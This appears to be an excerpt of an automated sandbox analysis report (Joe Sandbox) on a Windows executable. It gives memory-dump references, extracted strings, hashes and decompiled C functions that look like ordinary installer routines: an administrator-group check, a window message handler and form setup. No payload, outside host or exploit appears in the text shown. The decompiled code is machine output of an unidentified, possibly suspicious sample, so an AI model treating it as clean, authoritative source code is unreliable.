User opted not to overwrite the existing file. Skipping., xrefs: 0046FAA9
Time stamp of existing file: %s, xrefs: 0046F687
Installing into GAC, xrefs: 00470349
Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FA48
Incrementing shared file count (32-bit)., xrefs: 004701DA
Incrementing shared file count (64-bit)., xrefs: 004701C1
Non-default bitness: 32-bit, xrefs: 0046F517
Time stamp of our file: (failed to read), xrefs: 0046F603

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
API String ID: 0-4021121268
Opcode ID: a6c9852bf32d0c5257f8e805c60ec86f2557e2ba295dd2daab22a1b7099b0df6
Instruction ID: d6e35b5438cfa1292ec32bb890ff301da22716cbfac3a23e2a369b8a13cdcbbe
Opcode Fuzzy Hash: a6c9852bf32d0c5257f8e805c60ec86f2557e2ba295dd2daab22a1b7099b0df6
Instruction Fuzzy Hash: D3928330A0429CDFCB11DFA5D445BDDBBB1AF05304F5480ABE844AB392D7789E49CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042DF9C Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E0042DF9C(long __eax, void* __edi) {
				char _v5;
				void* _v12;
				signed int _v16;
				void* _v20;
				long _v24;
				void* _v28;
				void* _t84;
				intOrPtr* _t96;
				signed int _t97;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffffe8;
				if( *0x4980dc == 2) {
					_v5 = 0;
					if(AllocateAndInitializeSid(0x498788, 2, 0x20, __eax, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						goto L26;
					} else {
						_push(_t111);
						_push(0x42e180);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						_t96 = 0;
						if((GetVersion() & 0x000000ff) >= 5) {
							_t96 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
						}
						if(_t96 == 0) {
							_v28 = 0;
							if(OpenThreadToken(GetCurrentThread(), 8, 1,  &_v20) != 0) {
								L13:
								_push(_t111);
								_push(0x42e162);
								_push( *[fs:eax]);
								 *[fs:eax] = _t114;
								_v24 = 0;
								if(GetTokenInformation(_v20, 2, 0, 0,  &_v24) != 0 || GetLastError() == 0x7a) {
									_v28 = E00402648(_v24);
									if(GetTokenInformation(_v20, 2, _v28, _v24,  &_v24) != 0) {
										_t108 =  *_v28 - 1;
										if(_t108 >= 0) {
											_t109 = _t108 + 1;
											_t97 = 0;
											while(EqualSid(_v12,  *(_v28 + 4 + _t97 * 8)) == 0 || ( *(_v28 + 8 + _t97 * 8) & 0x00000014) != 4) {
												_t97 = _t97 + 1;
												_t109 = _t109 - 1;
												if(_t109 != 0) {
													continue;
												}
												goto L24;
											}
											_v5 = 1;
										}
										L24:
										_pop(_t102);
										 *[fs:eax] = _t102;
										_push(E0042E169);
										E00402660(_v28);
										return CloseHandle(_v20);
									} else {
										E004031BC();
										E004031BC();
										goto L26;
									}
								} else {
									E004031BC();
									E004031BC();
									goto L26;
								}
							} else {
								if(GetLastError() == 0x3f0) {
									if(OpenProcessToken(GetCurrentProcess(), 8,  &_v20) != 0) {
										goto L13;
									} else {
										E004031BC();
										goto L26;
									}
								} else {
									E004031BC();
									goto L26;
								}
							}
						} else {
							_t84 =  *_t96(0, _v12,  &_v16); // executed
							if(_t84 != 0) {
								asm("sbb eax, eax");
								_v5 =  ~( ~_v16);
							}
							_pop(_t103);
							 *[fs:eax] = _t103;
							_push(E0042E187);
							return FreeSid(_v12);
						}
					}
				} else {
					_v5 = 1;
					L26:
					return _v5;
				}
			}

0x0042df9d
0x0042df9f
0x0042dfad
0x0042dfb8
0x0042dfdd
0x00000000
0x0042dfe3
0x0042dfe5
0x0042dfe6
0x0042dfeb
0x0042dfee
0x0042dff1
0x0042e000
0x0042e017
0x0042e017
0x0042e01b
0x0042e044
0x0042e05c
0x0042e093
0x0042e095
0x0042e096
0x0042e09b
0x0042e09e
0x0042e0a3
0x0042e0bb
0x0042e0de
0x0042e0fa
0x0042e10d
0x0042e110
0x0042e112
0x0042e113
0x0042e115
0x0042e13f
0x0042e140
0x0042e141
0x00000000
0x00000000
0x00000000
0x0042e141
0x0042e139
0x0042e139
0x0042e143
0x0042e145
0x0042e148
0x0042e14b
0x0042e153
0x0042e161
0x0042e0fc
0x0042e0fc
0x0042e101
0x00000000
0x0042e101
0x0042e0c7
0x0042e0c7
0x0042e0cc
0x00000000
0x0042e0cc
0x0042e05e
0x0042e068
0x0042e087
0x00000000
0x0042e089
0x0042e089
0x00000000
0x0042e089
0x0042e06a
0x0042e06a
0x00000000
0x0042e06a
0x0042e068
0x0042e01d
0x0042e027
0x0042e02b
0x0042e036
0x0042e03a
0x0042e03a
0x0042e16b
0x0042e16e
0x0042e171
0x0042e17f
0x0042e17f
0x0042e01b
0x0042dfaf
0x0042dfaf
0x0042e187
0x0042e18f
0x0042e18f

APIs

AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFD6
GetVersion.KERNEL32(00000000,0042E180,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFF3
GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E180,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E00C
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E012
CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E180,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E027
FreeSid.ADVAPI32(00000000,0042E187,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E17A

Strings

advapi32.dll, xrefs: 0042E007
CheckTokenMembership, xrefs: 0042E002

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 2252812187-1888249752
Opcode ID: ee991278581fb71f4f407b944d638164dc01d1b63bc74503e7fcca8b120cb6b0
Instruction ID: 3b3aaf8f48684ababcaef7448b894cf2b51b75b84e8a6532a92d9fcf74061779
Opcode Fuzzy Hash: ee991278581fb71f4f407b944d638164dc01d1b63bc74503e7fcca8b120cb6b0
Instruction Fuzzy Hash: 8D51C371B44215AEEB10EAEA9C42BBF77ACEB09704F94047BB500F7282C57CD9158B69

Uniqueness

Uniqueness Score: -1.00%

Function 00423BF4 Relevance: 21.4, APIs: 14, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00423BF4(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t129;
				struct HWND__* _t130;
				struct HWND__* _t133;
				void* _t134;
				struct HWND__* _t135;
				struct HWND__* _t137;
				struct HWND__* _t139;
				struct HWND__* _t142;
				intOrPtr _t143;
				intOrPtr _t153;
				struct HWND__* _t160;
				struct HWND__* _t162;
				int _t165;
				int _t168;
				struct HWND__* _t169;
				struct HWND__* _t180;
				struct HWND__* _t186;
				intOrPtr _t187;
				struct HWND__* _t190;
				intOrPtr _t191;
				int _t198;
				struct HWND__* _t202;
				struct HWND__* _t207;
				struct HWND__* _t214;
				struct HWND__* _t216;
				intOrPtr _t217;
				struct HWND__* _t219;
				intOrPtr _t225;
				struct HWND__* _t241;
				struct HWND__* _t246;
				intOrPtr _t247;
				intOrPtr _t249;
				intOrPtr _t254;
				intOrPtr _t257;
				struct HWND__* _t262;
				int _t265;
				intOrPtr _t269;
				intOrPtr* _t274;
				void* _t279;
				intOrPtr _t281;
				struct HWND__* _t285;
				struct HWND__* _t286;
				void* _t300;
				void* _t303;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr _t330;
				void* _t331;
				void* _t333;
				void* _t338;
				void* _t339;
				intOrPtr _t340;

				_push(_t333);
				_push(_t331);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t339);
				_push(0x424144);
				_push( *[fs:edx]);
				 *[fs:edx] = _t340;
				 *(_v12 + 0xc) = 0;
				_t279 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x80)) + 8)) - 1;
				if(_t279 < 0) {
					L5:
					E00423B50(_v8, _v12);
					_t281 =  *_v12;
					_t129 = _t281;
					__eflags = _t129 - 0x112;
					if(__eflags > 0) {
						__eflags = _t129 - 0xb017;
						if(__eflags > 0) {
							_t130 = _t129 - 0xb01a;
							__eflags = _t130;
							if(_t130 == 0) {
								_t133 = IsIconic( *(_v8 + 0x20));
								__eflags = _t133;
								if(_t133 == 0) {
									_t135 = GetFocus();
									_t314 = _v8;
									__eflags = _t135 -  *((intOrPtr*)(_t314 + 0x20));
									if(_t135 ==  *((intOrPtr*)(_t314 + 0x20))) {
										_t137 = E0041EFDC(0);
										__eflags = _t137;
										if(_t137 != 0) {
											SetFocus(_t137);
										}
									}
								}
								L87:
								_t134 = 0;
								_pop(_t313);
								 *[fs:eax] = _t313;
								goto L88;
							}
							_t139 = _t130 - 5;
							__eflags = _t139;
							if(_t139 == 0) {
								E00424838(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L87;
							}
							_t142 = _t139 - 1;
							__eflags = _t142;
							if(_t142 == 0) {
								_t143 = _v12;
								__eflags =  *(_t143 + 4);
								if( *(_t143 + 4) != 0) {
									E00424514(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E004244BC(_v8, _t331, _t333,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L87;
							}
							__eflags = _t142 == 0x11;
							if(_t142 == 0x11) {
								_t153 = _v12;
								__eflags =  *((intOrPtr*)(_t153 + 4)) - 1;
								if( *((intOrPtr*)(_t153 + 4)) != 1) {
									 *(_v8 + 0x88) =  *(_v12 + 8);
								} else {
									 *(_v12 + 0xc) =  *(_v8 + 0x88);
								}
							} else {
								L86:
								E00423B6C(_t339); // executed
							}
							goto L87;
						}
						if(__eflags == 0) {
							_t160 =  *(_v8 + 0x28);
							__eflags = _t160;
							if(_t160 != 0) {
								_t335 = _t160;
								_t162 = E004181C8(_t160);
								__eflags = _t162;
								if(_t162 != 0) {
									_t165 = IsWindowEnabled(E004181C8(_t335));
									__eflags = _t165;
									if(_t165 != 0) {
										_t168 = IsWindowVisible(E004181C8(_t335));
										__eflags = _t168;
										if(_t168 != 0) {
											 *0x498578 = 0;
											_t169 = GetFocus();
											SetFocus(E004181C8(_t335));
											E00415228(_t335,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t169);
											 *0x498578 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L87;
						}
						_t180 = _t129 + 0xfffffece - 7;
						__eflags = _t180;
						if(_t180 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t281 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L87;
						}
						_t186 = _t180 - 0xaec7;
						__eflags = _t186;
						if(_t186 == 0) {
							_t187 = _v8;
							__eflags =  *((short*)(_t187 + 0xbe));
							if( *((short*)(_t187 + 0xbe)) != 0) {
								 *((intOrPtr*)(_v8 + 0xbc))();
							}
							goto L87;
						}
						_t190 = _t186 - 1;
						__eflags = _t190;
						if(_t190 == 0) {
							_t191 = _v8;
							__eflags =  *((short*)(_t191 + 0xb6));
							if( *((short*)(_t191 + 0xb6)) != 0) {
								 *((intOrPtr*)(_v8 + 0xb4))();
							}
							goto L87;
						}
						__eflags = _t190 == 0x15;
						if(_t190 == 0x15) {
							_t285 =  *(_v8 + 0x28);
							__eflags = _t285;
							if(_t285 != 0) {
								__eflags =  *(_t285 + 0x124);
								if( *(_t285 + 0x124) != 0) {
									_t198 = IsWindowEnabled(E004181C8(_t285));
									__eflags = _t198;
									if(_t198 != 0) {
										_t202 = E004122F8( *((intOrPtr*)( *(_v8 + 0x28) + 0x124)), _v12);
										__eflags = _t202;
										if(_t202 != 0) {
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L87;
						} else {
							goto L86;
						}
					}
					if(__eflags == 0) {
						_t207 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
						__eflags = _t207;
						if(_t207 == 0) {
							E0042417C(_v8, _t287);
						} else {
							__eflags = _t207 == 0x100;
							if(_t207 == 0x100) {
								E004241C4(_v8);
							} else {
								E00423B6C(_t339);
							}
						}
						goto L87;
					}
					__eflags = _t129 - 0x14;
					if(__eflags > 0) {
						_t214 = _t129 - 0x15;
						__eflags = _t214;
						if(_t214 == 0) {
							__eflags =  *0x498590 - 0x20;
							if( *0x498590 >= 0x20) {
								__eflags =  *0x49a648;
								if( *0x49a648 != 0) {
									 *0x49a648();
								}
							}
							goto L87;
						}
						_t216 = _t214 - 1;
						__eflags = _t216;
						if(_t216 == 0) {
							_t217 = _v12;
							__eflags =  *(_t217 + 4);
							if( *(_t217 + 4) != 0) {
								E00404E54();
							}
							goto L87;
						}
						_t219 = _t216 - 6;
						__eflags = _t219;
						if(_t219 == 0) {
							E00423B6C(_t339);
							_pop(_t300);
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x7d)) =  ~( ~( *(_v12 + 4)));
							_t225 = _v12;
							__eflags =  *(_t225 + 4);
							if( *(_t225 + 4) == 0) {
								E00423A6C(_v8, _t300);
								PostMessageA( *(_v8 + 0x20), 0xb001, 0, 0); // executed
							} else {
								E00423AFC(_v8);
								PostMessageA( *(_v8 + 0x20), 0xb000, 0, 0);
							}
							goto L87;
						}
						__eflags = _t219 == 0x1b;
						if(_t219 == 0x1b) {
							 *(_v12 + 0xc) = E00424160(_v8);
							goto L87;
						} else {
							goto L86;
						}
					}
					if(__eflags == 0) {
						 *_v12 = 0x27;
						E00423B6C(_t339);
						goto L87;
					}
					_t241 = _t129 - 7;
					__eflags = _t241;
					if(_t241 == 0) {
						PostMessageA( *(_v8 + 0x20), 0xb01a, 0, 0);
						E00423B6C(_t339);
						goto L87;
					}
					_t246 = _t241 - 3;
					__eflags = _t246;
					if(_t246 == 0) {
						_t247 = _v12;
						__eflags =  *(_t247 + 4);
						if( *(_t247 + 4) == 0) {
							E00423B6C(_t339);
							_pop(_t303);
							_t249 = _v8;
							__eflags =  *(_t249 + 0x84);
							if( *(_t249 + 0x84) == 0) {
								_t254 = E0041EE8C( *(_v8 + 0x20), _t281, _t331, _t333); // executed
								 *((intOrPtr*)(_v8 + 0x84)) = _t254;
							}
							E00423A6C(_v8, _t303);
						} else {
							E00423AFC(_v8);
							_t257 = _v8;
							_t258 =  *(_t257 + 0x84);
							__eflags =  *(_t257 + 0x84);
							if( *(_t257 + 0x84) != 0) {
								E0041EF40(_t258);
								__eflags = 0;
								 *((intOrPtr*)(_v8 + 0x84)) = 0;
							}
							E00423B6C(_t339);
						}
						goto L87;
					}
					_t262 = _t246 - 5;
					__eflags = _t262;
					if(_t262 == 0) {
						_t265 = IsIconic( *(_v8 + 0x20));
						__eflags = _t265;
						if(_t265 == 0) {
							E00423B6C(_t339);
						} else {
							E00423BA8(_t339);
						}
						goto L87;
					}
					__eflags = _t262 == 1;
					if(_t262 == 1) {
						_t269 = _v8;
						_t270 =  *(_t269 + 0x28);
						__eflags =  *(_t269 + 0x28);
						if( *(_t269 + 0x28) != 0) {
							E00422C34(_t270, _t287);
						}
						goto L87;
					} else {
						goto L86;
					}
				} else {
					_t286 = _t279 + 1;
					_t338 = 0;
					while(1) {
						_t274 = E0040B424( *((intOrPtr*)(_v8 + 0x80)), _t338);
						_t287 = _t274;
						if( *_t274() != 0) {
							_t134 = 0;
							_pop(_t330);
							 *[fs:eax] = _t330;
							break;
						}
						_t338 = _t338 + 1;
						_t286 = _t286 - 1;
						__eflags = _t286;
						if(_t286 != 0) {
							continue;
						}
						goto L5;
					}
					L88:
					return _t134;
				}
			}

0x00423bfb
0x00423bfc
0x00423bfd
0x00423c00
0x00423c05
0x00423c06
0x00423c0b
0x00423c0e
0x00423c16
0x00423c25
0x00423c28
0x00423c5c
0x00423c62
0x00423c6a
0x00423c6c
0x00423c6e
0x00423c73
0x00423cd4
0x00423cd9
0x00423d0f
0x00423d0f
0x00423d14
0x00424089
0x0042408e
0x00424090
0x00424096
0x0042409b
0x0042409e
0x004240a1
0x004240a9
0x004240ae
0x004240b0
0x004240b7
0x004240b7
0x004240b0
0x004240a1
0x0042413a
0x0042413a
0x0042413c
0x0042413f
0x00000000
0x0042413f
0x00423d1a
0x00423d1a
0x00423d1d
0x004240ce
0x00000000
0x004240ce
0x00423d23
0x00423d23
0x00423d24
0x004240d5
0x004240d8
0x004240dc
0x00424101
0x004240de
0x004240ec
0x004240ec
0x00000000
0x004240dc
0x00423d2a
0x00423d2d
0x00424108
0x0042410b
0x0042410f
0x0042412b
0x00424111
0x0042411d
0x0042411d
0x00423d33
0x00424133
0x00424134
0x00424139
0x00000000
0x00423d2d
0x00423cdb
0x00423f9c
0x00423f9f
0x00423fa1
0x00423fa7
0x00423fab
0x00423fb0
0x00423fb2
0x00423fc0
0x00423fc5
0x00423fc7
0x00423fd5
0x00423fda
0x00423fdc
0x00423fe2
0x00423fe9
0x00423ff8
0x00424011
0x00424017
0x0042401c
0x00424026
0x00424026
0x00423fdc
0x00423fc7
0x00423fb2
0x00000000
0x00423fa1
0x00423ce6
0x00423ce6
0x00423ce9
0x00423f1f
0x00000000
0x00423f1f
0x00423cef
0x00423cef
0x00423cf4
0x00424032
0x00424035
0x0042403d
0x0042404f
0x0042404f
0x00000000
0x0042403d
0x00423cfa
0x00423cfa
0x00423cfb
0x0042405a
0x0042405d
0x00424065
0x00424077
0x00424077
0x00000000
0x00424065
0x00423d01
0x00423d04
0x00423f41
0x00423f44
0x00423f46
0x00423f4c
0x00423f53
0x00423f61
0x00423f66
0x00423f68
0x00423f7d
0x00423f82
0x00423f84
0x00423f8d
0x00423f8d
0x00423f84
0x00423f68
0x00423f53
0x00000000
0x00423d0a
0x00000000
0x00423d0a
0x00423d04
0x00423c75
0x00423d43
0x00423d43
0x00423d48
0x00423d56
0x00423d4a
0x00423d4a
0x00423d4f
0x00423d63
0x00423d51
0x00423d6e
0x00423d73
0x00423d4f
0x00000000
0x00423d48
0x00423c7b
0x00423c7e
0x00423cad
0x00423cad
0x00423cb0
0x00423d91
0x00423d98
0x00423d9e
0x00423da5
0x00423dab
0x00423dab
0x00423da5
0x00000000
0x00423d98
0x00423cb6
0x00423cb6
0x00423cb7
0x00423f27
0x00423f2a
0x00423f2e
0x00423f34
0x00423f34
0x00000000
0x00423f2e
0x00423cbd
0x00423cbd
0x00423cc0
0x00423e28
0x00423e2d
0x00423e36
0x00423e3d
0x00423e40
0x00423e43
0x00423e47
0x00423e6e
0x00423e83
0x00423e49
0x00423e4c
0x00423e61
0x00423e61
0x00000000
0x00423e47
0x00423cc6
0x00423cc9
0x00423dfe
0x00000000
0x00423ccf
0x00000000
0x00423ccf
0x00423cc9
0x00423c80
0x00423de1
0x00423de8
0x00000000
0x00423ded
0x00423c86
0x00423c86
0x00423c89
0x00423e16
0x00423e1c
0x00000000
0x00423e21
0x00423c8f
0x00423c8f
0x00423c92
0x00423e8d
0x00423e90
0x00423e94
0x00423ec8
0x00423ecd
0x00423ece
0x00423ed1
0x00423ed8
0x00423ee0
0x00423ee8
0x00423ee8
0x00423ef1
0x00423e96
0x00423e99
0x00423e9e
0x00423ea1
0x00423ea7
0x00423ea9
0x00423eab
0x00423eb3
0x00423eb5
0x00423eb5
0x00423ebc
0x00423ec1
0x00000000
0x00423e94
0x00423c98
0x00423c98
0x00423c9b
0x00423dbd
0x00423dc2
0x00423dc4
0x00423dd3
0x00423dc6
0x00423dc7
0x00423dcc
0x00000000
0x00423dc4
0x00423ca1
0x00423ca2
0x00423d79
0x00423d7c
0x00423d7f
0x00423d81
0x00423d87
0x00423d87
0x00000000
0x00423ca8
0x00000000
0x00423ca8
0x00423c2a
0x00423c2a
0x00423c2b
0x00423c2d
0x00423c38
0x00423c3d
0x00423c49
0x00423c4b
0x00423c4d
0x00423c50
0x00423c53
0x00423c53
0x00423c58
0x00423c59
0x00423c59
0x00423c5a
0x00000000
0x00000000
0x00000000
0x00423c5a
0x00424159
0x0042415f
0x0042415f

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ed2d4eff5f21e2d273a30a68835fa0c31c3ed7187be1ae126b47985f9f97d7
Instruction ID: 46fa227836fc2d50815e942e6fe969caa4d2e3f2e188e2df11c4aae96532221a
Opcode Fuzzy Hash: e7ed2d4eff5f21e2d273a30a68835fa0c31c3ed7187be1ae126b47985f9f97d7
Instruction Fuzzy Hash: 8CE19230700124DFD710DF69E989A6EBBB0EF54315F9580AAE4459B392C73CEE92DB09

Uniqueness

Uniqueness Score: -1.00%

Function 00466728 Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1653
windowCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00466728(void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v9;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				struct HMENU__* _v28;
				char _v29;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v64;
				char _v68;
				char _t564;
				signed int _t580;
				signed int _t582;
				void* _t618;
				struct HINSTANCE__* _t658;
				intOrPtr _t701;
				intOrPtr _t702;
				intOrPtr _t725;
				intOrPtr _t726;
				intOrPtr _t750;
				intOrPtr _t751;
				intOrPtr _t766;
				intOrPtr _t767;
				intOrPtr _t800;
				void* _t813;
				void* _t838;
				void* _t859;
				intOrPtr _t889;
				intOrPtr _t922;
				void* _t935;
				void* _t961;
				intOrPtr _t983;
				intOrPtr _t1006;
				intOrPtr _t1034;
				intOrPtr _t1043;
				intOrPtr _t1058;
				intOrPtr _t1067;
				intOrPtr _t1068;
				void* _t1095;
				intOrPtr _t1131;
				char _t1136;
				char _t1137;
				intOrPtr _t1141;
				intOrPtr _t1148;
				void* _t1150;
				intOrPtr _t1151;
				intOrPtr _t1164;
				intOrPtr _t1169;
				void* _t1208;
				intOrPtr _t1209;
				intOrPtr _t1218;
				intOrPtr _t1223;
				intOrPtr _t1225;
				intOrPtr _t1229;
				intOrPtr _t1240;
				void* _t1242;
				intOrPtr _t1244;
				intOrPtr _t1256;
				intOrPtr _t1281;
				void* _t1283;
				intOrPtr _t1291;
				void* _t1293;
				intOrPtr _t1295;
				intOrPtr _t1302;
				intOrPtr _t1315;
				intOrPtr _t1348;
				intOrPtr _t1353;
				intOrPtr _t1358;
				intOrPtr _t1394;
				intOrPtr _t1460;
				intOrPtr* _t1471;
				intOrPtr _t1472;
				intOrPtr _t1486;
				char _t1520;
				intOrPtr _t1540;
				intOrPtr _t1541;
				intOrPtr _t1542;
				intOrPtr _t1543;
				intOrPtr _t1553;
				intOrPtr _t1557;
				signed int _t1561;
				intOrPtr _t1574;
				intOrPtr _t1581;
				intOrPtr _t1582;
				intOrPtr _t1584;
				intOrPtr _t1585;
				intOrPtr _t1593;
				intOrPtr _t1597;
				intOrPtr _t1603;
				void* _t1631;
				intOrPtr _t1639;
				void* _t1691;
				intOrPtr _t1697;
				intOrPtr _t1707;
				intOrPtr _t1723;
				intOrPtr _t1724;
				intOrPtr _t1728;
				intOrPtr _t1732;
				intOrPtr _t1733;
				intOrPtr _t1740;
				intOrPtr _t1741;
				intOrPtr _t1746;
				intOrPtr _t1761;
				intOrPtr _t1767;
				intOrPtr _t1784;
				intOrPtr _t1795;
				intOrPtr _t1805;
				signed int _t1822;
				signed int _t1823;
				signed int _t1828;
				signed int _t1829;
				intOrPtr _t1833;
				intOrPtr _t1842;
				intOrPtr _t1843;
				intOrPtr _t1846;
				intOrPtr _t1850;
				signed int _t1868;
				signed int _t1870;
				void* _t1871;
				void* _t1876;
				void* _t1877;
				intOrPtr* _t1879;
				void* _t1886;
				intOrPtr* _t1887;
				struct HMENU__* _t1895;
				void* _t1896;
				struct HMENU__* _t1897;
				signed int _t1898;
				void* _t1900;
				void* _t1901;
				intOrPtr _t1902;
				void* _t1908;
				void* _t1909;
				signed char _t1913;
				void* _t1920;
				void* _t1923;
				void* _t1926;
				void* _t1980;

				_t1980 = __fp0;
				_t1852 = __edi;
				_t1520 = __edx;
				_t1472 = __ecx;
				_t1900 = _t1901;
				_t1902 = _t1901 + 0xffffffc0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v52 = 0;
				_v68 = 0;
				_v24 = 0;
				if(__edx != 0) {
					_t1902 = _t1902 + 0xfffffff0;
					_t564 = E00402D30(_t564, _t1900);
				}
				_v16 = _t1472;
				_v9 = _t1520;
				_v8 = _t564;
				_t1471 =  &_v8;
				 *[fs:eax] = _t1902;
				E00493A10(0); // executed
				 *((intOrPtr*)( *_t1471 + 0x2f8)) = E00402B30(1);
				 *((intOrPtr*)( *_t1471 + 0x334)) = E00402B30(1);
				 *((intOrPtr*)( *_t1471 + 0x320)) = E00402B30(1);
				 *((intOrPtr*)( *_t1471 + 0x324)) = E00402B30(1);
				 *((intOrPtr*)( *_t1471 + 0x328)) = E00402B30(1);
				 *((intOrPtr*)( *_t1471 + 0x32c)) = E00402B30(1);
				_t580 =  *0x49b328; // 0x2262ab4
				_t1868 =  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x250)) + 0x30)) -  *((intOrPtr*)( *_t580 + 0x1c))( *[fs:eax], 0x467e59, _t1900);
				if(_t1868 > 0) {
					_t1460 =  *((intOrPtr*)( *_t1471 + 0x250));
					E00414624( *((intOrPtr*)( *_t1471 + 0x250)),  *((intOrPtr*)(_t1460 + 0x30)) - _t1868);
					_t1850 =  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x250)) + 0x28));
					_t1898 = _t1868 >> 1;
					if( *((intOrPtr*)(_t1460 + 0x30)) - _t1868 < 0) {
						asm("adc esi, 0x0");
					}
					E004145E4( *((intOrPtr*)( *_t1471 + 0x250)), _t1850 + _t1898);
